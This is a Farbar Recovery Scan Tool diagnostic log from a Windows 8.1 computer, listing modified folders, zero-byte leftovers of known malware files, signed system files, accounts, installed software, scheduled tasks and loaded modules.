2019-02-14 02:25 - 2018-04-10 15:07 - 000000000 ____D C:\Users\Stanley\Desktop\URCH
2019-02-14 02:23 - 2018-06-05 13:20 - 000000000 ____D C:\Users\Stanley\Desktop\final
2019-02-14 02:23 - 2018-05-09 22:35 - 000000000 __SHD C:\Users\Stanley\AppData\Roaming\C67FA6
2019-02-12 21:30 - 2018-05-03 17:51 - 000000000 ____D C:\Users\Stanley
2019-02-12 06:38 - 2018-05-12 16:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2019-02-10 23:14 - 2018-06-06 18:15 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios Data Transfer
2019-02-10 23:08 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\Registration
2019-02-10 22:09 - 2018-05-14 11:19 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinAce
2019-02-10 22:04 - 2018-05-04 12:30 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\Mozilla
2019-02-10 07:30 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\AppReadiness
2019-02-09 01:51 - 2018-10-18 00:37 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iMobie
2019-02-09 01:51 - 2018-10-18 00:37 - 000000000 ____D C:\Program Files (x86)\iMobie
2019-02-08 23:59 - 2018-05-03 23:45 - 000000082 _____ C:\Windows\SysWOW64\winsevr.dat
2019-02-08 23:36 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\IDM
2019-02-08 23:00 - 2018-10-18 01:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iSkysoft
2019-02-08 23:00 - 2018-10-18 01:09 - 000000000 ____D C:\ProgramData\iSkysoft
2019-02-07 02:08 - 2018-10-18 00:38 - 000000000 ____D C:\Users\Stanley\AppData\Local\iMobie_Inc
2019-02-06 07:21 - 2018-10-20 09:06 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios Data Recovery
2019-02-06 06:29 - 2018-04-24 22:26 - 000000000 ____D C:\Program Files\Recuva
2019-02-06 06:23 - 2018-05-19 23:54 - 000363748 _____ C:\Users\Stanley\Desktop\arms & ammunition.txt
2019-02-06 05:57 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\Downloads\Compressed
2019-02-05 11:33 - 2018-06-06 18:08 - 000000000 ____D C:\Program Files (x86)\Anvsoft
2019-02-05 09:51 - 2018-06-06 21:44 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Apple Computer
2019-02-05 07:07 - 2018-10-18 00:12 - 000000000 ____D C:\ProgramData\Wondershare
2019-02-05 07:06 - 2018-10-18 01:06 - 000000000 ____D C:\Users\Public\Documents\iSkysoft
2019-02-05 07:05 - 2018-10-18 01:09 - 000000000 ____D C:\Program Files (x86)\iSkysoft
2019-02-05 01:31 - 2018-10-18 00:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2019-02-05 00:37 - 2018-10-18 00:06 - 000000000 ____D C:\Users\Public\Documents\Wondershare
2019-02-05 00:16 - 2018-06-06 18:15 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios
2019-01-26 22:19 - 2018-12-27 19:45 - 000000000 ___RD C:\Users\Stanley\OneDrive (3).old
2019-01-25 09:31 - 2018-06-04 00:07 - 000000000 ____D C:\Users\Stanley\AppData\Local\ElevatedDiagnostics
2019-01-24 10:28 - 2018-06-03 08:56 - 000000887 _____ C:\Users\Public\Desktop\VLC media player.lnk
2019-01-23 15:45 - 2018-05-04 07:39 - 000000000 ____D C:\Program Files (x86)\TeamViewer

==================== Files in the root of some directories =======

2018-08-18 10:56 - 2014-12-19 17:43 - 000000034 _____ () C:\Users\Stanley\AppData\Roaming\pdfdrawcodec.dll
2019-02-05 00:49 - 2019-02-05 00:49 - 000140800 _____ () C:\Users\Stanley\AppData\Local\installer.dat
2018-06-02 10:15 - 2018-06-02 10:15 - 000007611 _____ () C:\Users\Stanley\AppData\Local\Resmon.ResmonCfg

Some zero byte size files/folders:
==========================
C:\Windows\mssecsvc.exe
C:\Windows\SysWOW64\taskshostservices.exe
C:\Windows\System32\taskshostservices.exe
C:\Windows\System32\Drivers\WinmonProcessMonitor.sys
C:\Windows\SysWOW64\Drivers\winmon.sys
C:\Windows\SysWOW64\Drivers\winmonfs.sys
C:\Windows\SysWOW64\Drivers\WinmonProcessMonitor.sys

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\dllhost.exe => File is digitally signed
C:\Windows\SysWOW64\dllhost.exe => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2019-02-13 14:45

==================== End of FRST.txt ============================


addition.txt

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 13.02.2019
Ran by #Strazzo.RoseGold## (17-02-2019 12:47:56)
Running from C:\Users\Stanley\Downloads\FRST
Windows 8.1 Enterprise (Update) (X64) (2018-05-03 16:52:27)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

#Strazzo.RoseGold## (S-1-5-21-1692593245-3285590566-2148222763-1001 - Administrator - Enabled) => C:\Users\Stanley
Administrator (S-1-5-21-1692593245-3285590566-2148222763-500 - Administrator - Enabled) => C:\Users\Administrator
Guest (S-1-5-21-1692593245-3285590566-2148222763-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1692593245-3285590566-2148222763-1003 - Limited - Disabled)
RoseGold (S-1-5-21-1692593245-3285590566-2148222763-1004 - Administrator - Enabled) => C:\Users\RoseGold

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.)
1.1.3 (HKLM-x32\...\{A4046FE1-986B-4463-B4DD-CFA473A7056B}_is1) (Version:  - PDFZilla)
7-Zip 15.14 (HKLM-x32\...\7-Zip) (Version: 15.14 - Igor Pavlov)
Ability Mail Server 4.2.6 (HKLM-x32\...\Ability Mail Server 4_is1) (Version:  - Code Crafters Software Limited)
Adobe Flash Player 20 ActiveX & Plugins 64-bit (HKLM\...\Adobe Flash Player ActiveX) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Apple Application Support (32-bit) (HKLM-x32\...\{5A659BE5-849B-484E-A83B-DCB78407F3A4}) (Version: 7.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{F8060941-C0AB-4BCE-88AC-F2FDA2E9F286}) (Version: 7.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{5FA8C4BE-8C74-4B9C-9B49-EBF759230189}) (Version: 12.1.0.25 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.)
BlackBerry 10 Desktop Software (Blend, Link, Drivers) (HKLM-x32\...\{c33e77db-89b5-4abf-a1d1-97f8b35347e1}) (Version: 1.2.0.52 - BlackBerry)
BlackBerry Blend (HKLM-x32\...\{1DA42C01-4ED2-4B4E-B90C-18FCBA12FC41}) (Version: 1.2.0.50 - BlackBerry Ltd.) Hidden
BlackBerry Communication Drivers (HKLM-x32\...\{46CD5A63-0C1F-45C3-B643-CA87A17275C0}) (Version: 8.0.0.143 - BlackBerry Ltd.) Hidden
BlackBerry Device Drivers (HKLM-x32\...\{1F6490E5-7540-426D-BC1E-EB57B0BF0C38}) (Version: 8.0.0.143 - BlackBerry Ltd.) Hidden
BlackBerry Link (HKLM-x32\...\{C42468F9-9812-4550-A54B-5DDB062EB10F}) (Version: 1.2.4.39 - BlackBerry) Hidden
BlackBerry Link Remover (HKLM-x32\...\{44D65CAB-1BC8-47B7-BF5B-3EB8B6BB0276}) (Version: 1.2.4.0 - BlackBerry Ltd.) Hidden
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
FlashPeak Slimjet (HKLM-x32\...\Slimjet) (Version: 7.0.1.0 - FlashPeak Inc.)
GLO 3G PLUS (HKLM-x32\...\GLO 3G PLUS) (Version: 11.300.05.03.251 - Huawei Technologies Co.,Ltd)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 72.0.3626.109 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
HP Hotkey Support (HKLM-x32\...\{6E7401DB-B722-4428-BE94-DD4740CF6464}) (Version: 5.0.28.1 - Hewlett-Packard Company)
HP Software Framework (HKLM-x32\...\{886D1141-25E5-431F-8326-C3DB6FFCCAF0}) (Version: 4.0.96.1 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{930B5F2B-8DB9-42F4-90E4-5D3DC30541C3}) (Version: 12.10.49.21 - HP Inc.)
HP System Event Utility (HKLM-x32\...\{29E20347-C62F-4657-938E-876A182B67F1}) (Version: 1.4.13 - HP Inc.)
iCloud (HKLM\...\{05D97028-FD26-4A3D-BADC-D1CA2E9F1214}) (Version: 7.10.0.9 - Apple Inc.)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4229 - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version:  - Tonec Inc.)
iTunes (HKLM\...\{D9D08A8F-5A03-486A-AD4D-3A438D521F8B}) (Version: 12.9.3.3 - Apple Inc.)
KeePass Password Safe 2.39.1 (HKLM-x32\...\KeePassPasswordSafe2_is1) (Version: 2.39.1 - Dominik Reichl)
LSI HDA Modem (HKLM\...\LSI Soft Modem) (Version: 2.2.100 - LSI Corporation)
Malwarebytes version 3.7.1.2839 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.7.1.2839 - Malwarebytes)
Microsoft .NET Framework 1.1 (HKLM-x32\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2698023) (HKLM-x32\...\M2698023) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2833941) (HKLM-x32\...\M2833941) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM-x32\...\M979906) (Version:  - )
Microsoft .NET Framework 1.1 SP1 (HKLM\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version:  - )
Microsoft .NET Framework 1.1 SP1 (HKLM\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft Office Professional Edition 2003 (HKLM-x32\...\{90110409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.5614.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{1a63c099-febd-4eaf-83ad-a82ea4fdac49}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{b55f7208-e02b-4828-ac78-59c73ddf5bc7}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation)
OpenVPN 2.4.6-I602  (HKLM\...\OpenVPN) (Version: 2.4.6-I602 - OpenVPN Technologies, Inc.)
Opera Stable 58.0.3135.65 (HKLM-x32\...\Opera 58.0.3135.65) (Version: 58.0.3135.65 - Opera Software)
PowerISO (HKLM-x32\...\PowerISO) (Version: 7.2 - Power Software Ltd)
Registry Recycler (HKLM-x32\...\Registry Recycler_is1) (Version: 0.9.3.1 - Developer Tribe (Pvt) Ltd.)
SAM CoDeC Pack (HKLM\...\SAM CoDeC Pack) (Version: 5.85 - www.SamLab.ws)
Skype version 8.39 (HKLM-x32\...\Skype_is1) (Version: 8.39 - Skype Technologies S.A.)
SmarterMail Sync for Outlook 2003 and above (HKLM-x32\...\{6567F265-62EC-4BA9-9629-6B483B608854}) (Version: 1.0 - Smarter Tools)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.19.65 - Synaptics Incorporated)
Syncios 6.5.8 (HKLM-x32\...\Syncios) (Version: 6.5.8 - Anvsoft)
Syncios Data Recovery 2.0.5 (HKLM-x32\...\06d5deef-8cb6-52ed-a43f-f181f836384a) (Version: 2.0.5 - Syncios Data Recovery)
TAP-Windows 9.21.2 (HKLM\...\TAP-Windows) (Version: 9.21.2 - )
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.53254 - TeamViewer)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.6 - VideoLAN)
WhatsApp (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\WhatsApp) (Version: 0.3.1409 - WhatsApp)
WinAce Archiver (HKLM-x32\...\WinAce Archiver) (Version: 2.69 - e-merge GmbH)
Windows Driver Package - Google Corporation (androidusb) USB  (11/11/2015 1.0.0020.00000) (HKLM\...\964D20A0C219E8C327639DBA3C1FD49434216922) (Version: 11/11/2015 1.0.0020.00000 - Google Corporation)
Windows Driver Package - Google, Inc. (WinUSB) AndroidUsbDeviceClass  (11/11/2015 2.0.0020.00000) (HKLM\...\B02D55DC05C888A284041A2F8A294C0D557A218C) (Version: 11/11/2015 2.0.0020.00000 - Google, Inc.)
Windows Driver Package - SAMSUNG Electronics Co., Ltd.  (ssudmdm) Modem  (08/24/2016 2.12.4.0) (HKLM\...\B8C7DCAC7E5C993BD8367E5832C6C99E0B248D7A) (Version: 08/24/2016 2.12.4.0 - SAMSUNG Electronics Co., Ltd. )
Windows Driver Package - SAMSUNG Electronics Co., Ltd.  (WinUSB) AndroidUsbDeviceClass  (08/24/2016 2.12.4.0) (HKLM\...\609138CA03F1F9B54E04FA4DAB7C0C3F28DE9464) (Version: 08/24/2016 2.12.4.0 - SAMSUNG Electronics Co., Ltd. )
WinRAR 5.30 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ShellIconOverlayIdentifiers: [IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2014-04-21] (Tonec Inc. -> Tonec Inc.)
ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers1-x32: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP3\System\aimp_menu64.dll -> No File
ContextMenuHandlers1-x32: [PhotoStreamsExt] -> {89D984B3-813B-406A-8298-118AFA3A22AE} => C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll [2019-01-15] (Apple Inc. -> Apple Inc.)
ContextMenuHandlers1-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd)
ContextMenuHandlers1-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32-x32-x32: [ZFAdd] -> {8FF88D27-7BD0-11D1-BFB7-00AA00262A11} => C:\Program Files (x86)\WinAce\arcext.dll [2007-11-08] (e-merge GmbH)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers4-x32: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP3\System\aimp_menu64.dll -> No File
ContextMenuHandlers4-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd)
ContextMenuHandlers4-x32-x32: [ZFAdd] -> {8FF88D27-7BD0-11D1-BFB7-00AA00262A11} => C:\Program Files (x86)\WinAce\arcext.dll [2007-11-08] (e-merge GmbH)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2015-06-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers6-x32: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd)
ContextMenuHandlers6-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {019A414B-EDCF-464E-A4FF-6E1780935AB0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe (HP Inc. -> HP Inc.)
Task: {121858E1-B466-49DB-ABBF-BE0AD32980CE} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1692593245-3285590566-2148222763-1001UA => C:\Users\Stanley\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {44D766A4-890D-4187-8209-27B0E5320737} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe (Apple Inc. -> Apple Inc.)
Task: {4759FCE5-417F-4558-A8AE-4C124D2B53A7} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Synaptics Incorporated -> Synaptics Incorporated)
Task: {4B307496-C19B-4F0D-8A51-8EA93C3082D4} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.)
Task: {531B0429-4A10-4627-84B1-F2408752272D} - System32\Tasks\HPCeeScheduleFor#Strazzo.RoseGold## => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe (Hewlett-Packard Company -> HP Inc.)
Task: {766C85C7-D024-4937-AD2A-1D565A0EFE0E} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe (HP Inc. -> HP Inc.)
Task: {7F232E68-AE32-41F8-B98F-689DC0D3D5E5} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe (HP Inc. -> HP Inc.)
Task: {8292C123-B9AC-4784-B31B-420E6D1FFE44} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe (HP Inc. -> HP Inc.)
Task: {83DEE68E-A3DD-4AE5-9A83-06EC0861E6BA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.)
Task: {9983ADBE-CDF4-4EB7-BA08-126F95152E4E} - System32\Tasks\Opera scheduled Autoupdate 1525449700 => C:\Program Files\Opera\launcher.exe (Opera Software AS -> Opera Software)
Task: {B5D3DB14-5265-4538-9CB9-FDAA4A1D4D8B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe (HP Inc. -> HP Inc.)
Task: {C28388CC-478E-460F-BC73-1BB706E4CB8B} - System32\Tasks\{C2F55618-3604-4E37-AF83-6C71B337894D} => C:\Windows\system32\pcalua.exe -a C:\Users\Stanley\Downloads\Programs\ability-mail-server\setup.exe -d C:\Users\Stanley\Downloads\Programs\ability-mail-server
Task: {DA1D9517-63D2-4DD4-B496-824CB060ABE0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe (HP Inc. -> HP Inc.)
Task: {DCD49F79-E1DD-40AB-8653-E3D1BA2C9E1F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe (HP Inc. -> HP Inc.)
Task: {E6E376AE-3FCC-45F3-89EB-014031777959} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe (HP Inc. -> HP Inc.)
Task: {E9BDD47D-D63C-4F59-8B54-0B30B7E5D664} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1692593245-3285590566-2148222763-1001Core => C:\Users\Stanley\AppData\Local\Google\Update\GoogleUpdate.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe+HPCeeScheduleFor#Strazzo.RoseGold## (null)!STRAZZOWEEZY\#Strazzo.Ros

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


Shortcut: C:\Users\Stanley\AppData\Roaming\Microsoft\Windows\Network Shortcuts\My Web Sites on MSN\target.lnk -> hxxp://www.msnusers.co

ShortcutWithArgument: C:\Users\Stanley\Desktop\Chrome Plus - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Default"
ShortcutWithArgument: C:\Users\Stanley\Desktop\WORKHARDGROUP - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1"
ShortcutWithArgument: C:\Users\Stanley\Desktop\WORKHARDGROUP 2 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2"
ShortcutWithArgument: C:\Users\Stanley\Desktop\WORKHARDGROUP 3 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 3"
ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\Яндекс.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x0000002a hxxp://www.yandex.ru/?win=331&clid=2100779
ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\Яндекс.Почта.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x00000038 hxxp://mail.yandex.ru/?win=331&clid=2100779&from=dist_tl

==================== Loaded Modules (Whitelisted) ==============

2018-05-16 02:59 - 2018-05-16 02:59 - 000088888 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2019-01-15 01:27 - 2019-01-15 01:27 - 001356088 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2018-04-26 17:24 - 2018-04-26 17:24 - 000226208 _____ () C:\Program Files\OpenVPN\bin\liblzo2-2.dll
2018-04-26 17:24 - 2018-04-26 17:24 - 000127488 _____ () C:\Program Files\OpenVPN\bin\libpkcs11-helper-1.dll
2015-06-02 05:00 - 2015-06-02 05:00 - 000102912 _____ () C:\Windows\System32\IccLibDll_x64.dll
2019-01-23 16:33 - 2019-01-23 16:33 - 000088888 _____ () C:\Program Files\iTunes\zlib1.dll
2019-01-23 16:33 - 2019-01-23 16:33 - 001356088 _____ () C:\Program Files\iTunes\libxml2.dll
2019-02-15 00:30 - 2019-01-25 16:36 - 002845712 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2019-02-15 00:30 - 2019-01-24 11:09 - 002714000 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
2015-05-26 16:46 - 2015-05-26 16:46 - 000094208 _____ () C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\libxpmux.dll
2018-04-12 18:06 - 2019-02-08 19:51 - 001837672 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\ffmpeg.dll
2019-02-14 02:43 - 2019-02-08 19:51 - 002400096 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\slimcore\bin\skypert.dll
